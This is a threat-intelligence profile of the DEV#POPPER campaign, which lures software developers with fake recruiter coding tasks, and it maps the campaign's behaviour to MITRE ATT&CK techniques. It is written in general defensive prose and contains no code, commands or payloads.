DEV#POPPER (Campaign) – Malware

Overview

The DEV#POPPER campaign represents a sophisticated and evolving cyber threat, targeting software developers through complex social engineering tactics. Initially identified in early 2024, DEV#POPPER is attributed to North Korean threat actors who have continually refined their approach to compromise unsuspecting individuals working within the tech industry. By posing as legitimate recruiters, the attackers leverage well-crafted lures that convince victims to download and execute malicious files under the guise of job interview assessments. Once activated, these files initiate an elaborate infection chain, exploiting platform-specific malware that now extends across Windows, Linux, and macOS operating systems. This cross-platform adaptability marks a significant evolution from the campaign’s earlier stages and demonstrates the attackers’ adaptability and determination to infiltrate a wide range of systems.

Targets

Individuals

Information

How they operate

Initial Access Through Social Engineering

DEV#POPPER relies heavily on spearphishing as its primary method of initial access, often posing as tech recruiters or business representatives to lure victims into opening attachments. These attachments masquerade as project files, coding challenges, or sample code that a developer might expect during a job interview or recruitment process. Upon downloading and executing these files, victims unknowingly activate the malware, initiating a chain of scripts that establish a foothold in their system. This method of delivery is effective, as it appeals to the curiosity and ambitions of developers looking to showcase their skills or make new career advancements.

Establishing Persistence and Gaining Control

Once installed, DEV#POPPER employs a combination of obfuscation techniques and stealthy persistence mechanisms to evade detection. The malware is often embedded in legitimate scripts or application files, using common interpreter languages like PowerShell or Python, which are familiar in development environments. The malicious code often configures itself to launch automatically on system boot or user logon, ensuring that it remains active even after system restarts. It may also create scheduled tasks or services that regularly initiate contact with command and control (C2) servers, allowing attackers to deploy further payloads or update the malware as needed.

Credential Theft and Data Collection

One of DEV#POPPER’s primary goals is credential theft, targeting stored credentials, API keys, and sensitive information that developers frequently handle. To accomplish this, the malware leverages keylogging functionality, capturing keystrokes as developers input credentials or sensitive data into development tools and cloud environments. It may also use input capture to steal passwords and access tokens directly from clipboard data or cached entries. This stolen information is crucial for attackers, who can later use it to infiltrate other systems or gain access to proprietary software, source code repositories, and cloud services utilized by the developer or their organization.

Command and Control Communication and Exfiltration

After gathering critical information, DEV#POPPER establishes an encrypted communication channel with its C2 server, typically using HTTPS to mimic normal internet traffic and evade network detection. The malware then exfiltrates collected data, including credentials, system information, and any captured screenshots, over this secure channel to prevent easy interception. Additionally, DEV#POPPER frequently uses encryption to obscure its payload, further complicating efforts to detect and analyze its activities. This continuous communication loop enables attackers to monitor infected systems in real-time, allowing them to deploy additional malware modules, modify existing configurations, or trigger specific actions based on the data collected.

The DEV#POPPER campaign’s highly targeted approach and deep knowledge of development practices make it a potent threat to the software industry. Its combination of social engineering, stealthy persistence, and advanced exfiltration methods highlights the need for developers to remain vigilant and adopt robust security protocols. By raising awareness of these sophisticated techniques, organizations and individuals alike can better defend against campaigns like DEV#POPPER, which exploit both technical vulnerabilities and human psychology to compromise high-value targets.

MITRE Tactics and Techniques

1. Initial Access (TA0001)

Spearphishing Attachment (T1566.001): DEV#POPPER uses highly targeted spearphishing emails, often posing as job recruiters or potential employers. These messages contain malicious attachments, typically disguised as coding assessments or job application tasks, enticing developers to open them.

Drive-by Compromise (T1189): In some instances, DEV#POPPER has used compromised websites or developer forums to host malware-laden files, which unsuspecting developers might download, leading to infection.

2. Execution (TA0002)

User Execution: Malicious File (T1204.002): Attackers rely on social engineering to encourage victims to execute seemingly benign files. These files often contain malware embedded within legitimate-looking scripts or applications.

Command and Scripting Interpreter (T1059): Once on the victim’s device, DEV#POPPER’s malware executes through common scripting interpreters (such as PowerShell, Bash, or AppleScript), depending on the operating system in use.

3. Persistence (TA0003)

Boot or Logon Autostart Execution (T1547): DEV#POPPER establishes persistence by configuring itself to launch upon system boot or user logon. This ensures that the malware remains active even after system reboots.

Scheduled Task/Job (T1053): The malware often creates scheduled tasks to periodically re-establish connections to command and control (C2) servers or execute additional malicious code.

4. Privilege Escalation (TA0004)

Exploitation for Privilege Escalation (T1068): The malware may attempt to exploit vulnerabilities in the operating system or applications to gain elevated privileges, enabling further access and control over the system.

5. Defense Evasion (TA0005)

Obfuscated Files or Information (T1027): DEV#POPPER uses extensive obfuscation techniques, such as Base64 encoding and string concatenation, to disguise its malicious payload and evade detection by security software.

Masquerading (T1036): Malicious files are often disguised with legitimate-looking names or icons, making them appear as harmless files to developers.

Deobfuscate/Decode Files or Information (T1140): The malware contains layers of encoding and decoding routines, making it harder for automated detection systems to analyze its payload.

6. Credential Access (TA0006)

OS Credential Dumping (T1003): DEV#POPPER may attempt to dump system credentials to elevate its access and move laterally across networks. It targets cached credentials, particularly on Windows systems.

Input Capture (T1056): The malware may employ keylogging or input capture to steal login credentials and other sensitive information directly from user inputs.

7. Discovery (TA0007)

System Information Discovery (T1082): DEV#POPPER collects information about the infected host, such as operating system details, installed applications, and network configuration.

Network Service Scanning (T1046): The malware scans for accessible network services, which helps it map the victim’s environment and locate additional attack vectors or valuable targets.

8. Collection (TA0009)

Screen Capture (T1113): DEV#POPPER captures screenshots from the infected system, potentially capturing sensitive information visible on the developer’s screen.

Keylogging (T1056.001): The campaign uses keylogging to capture keystrokes, helping attackers collect credentials, API keys, and other critical information that developers frequently handle.

9. Command and Control (TA0011)

Application Layer Protocol (T1071): DEV#POPPER communicates with its C2 servers using standard application protocols (e.g., HTTPS) to blend in with normal network traffic and avoid detection.

Encrypted Channel (T1573): Communication between the malware and C2 is often encrypted, making it challenging for defenders to analyze the transmitted data without decryption keys.

10. Exfiltration (TA0010)

Exfiltration Over C2 Channel (T1041): The malware exfiltrates stolen data, such as credentials and system information, through its C2 channels, allowing attackers to retrieve the information stealthily.

Automated Exfiltration (T1020): DEV#POPPER regularly transmits data back to the C2 server, automating the exfiltration process to reduce the need for manual intervention.

11. Impact (TA0040)

Data Manipulation (T1565): The attackers may modify or delete code repositories and project files, potentially damaging the victim’s work or sabotaging software development efforts.

Endpoint Denial of Service (T1499): DEV#POPPER’s persistence mechanisms and data collection routines can lead to system slowdowns and unresponsive applications, disrupting the productivity of the developer.

Reference: 

• Research Update: Threat Actors Behind the DEV#POPPER Campaign Have Retooled and are Continuing to Target Software Developers via Social Engineering